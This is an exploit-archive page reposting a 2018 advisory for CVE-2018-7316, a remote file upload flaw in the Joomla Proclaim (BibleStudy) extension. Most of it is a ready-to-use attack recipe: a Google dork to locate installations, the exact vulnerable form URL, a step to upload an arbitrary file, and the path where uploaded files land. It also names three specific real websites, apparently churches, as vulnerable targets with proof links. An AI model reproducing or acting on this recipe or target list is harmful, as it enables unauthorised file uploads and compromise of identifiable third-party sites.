Advertisement






Joomla Com_BibleStudy Proclaim MediaFileForm Remote File Upload Vulnerability

CVE Category Price Severity
CVE-2018-7316 CWE-264 $1,000 - $5,000 High
Author Risk Exploitation Type Date
Richard Jones Critical Remote 2018-09-28
CVSS EPSS EPSSP
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H 0.02192 0.50148

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2018090270

Below is a copy:

Joomla Com_BibleStudy Proclaim MediaFileForm Remote File Upload Vulnerability
#################################################################################################

# Exploit Title : Joomla Com_BibleStudy Proclaim MediaFileForm Remote File Upload Vulnerability
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
# Date : 28/09/2018
# Vendor Homepage : joomlabiblestudy.org ~ extensions.joomla.org/extension/proclaim/
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# CVE: CVE-2018-7316
# CWE : CWE-264 [ Permissions, Privileges, and Access Controls ]

#################################################################################################

# Google Dork  : 

inurl:''/index.php?option=com_biblestudy''

# Exploit : 

TARGET/index.php?option=com_biblestudy&view=mediafileform&layout=edit&id=1

# Note : Go to the '' Media Files '' Category. Choose your File and Upload it. 

# Directory File Path : 

TARGET/images/biblestudy/media/....

#################################################################################################

# Example Vulnerable Sites =>  

kalamekhuda.com/index.php?option=com_biblestudy&view=mediafileform&layout=edit&id=1 

=> [ Proof of Concept for Vulnerability and Proof of Mirror ] => archive.is/nfskL => archive.is/5NaKe

hereatcalvary.org/index.php?option=com_biblestudy&view=mediafileform&layout=edit&id=1 [ Proof of Concept ] => archive.is/oEPx3

cclivinghope.org/index.php?option=com_biblestudy&view=mediafileform&layout=edit&id=1

#################################################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team 

#################################################################################################

Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum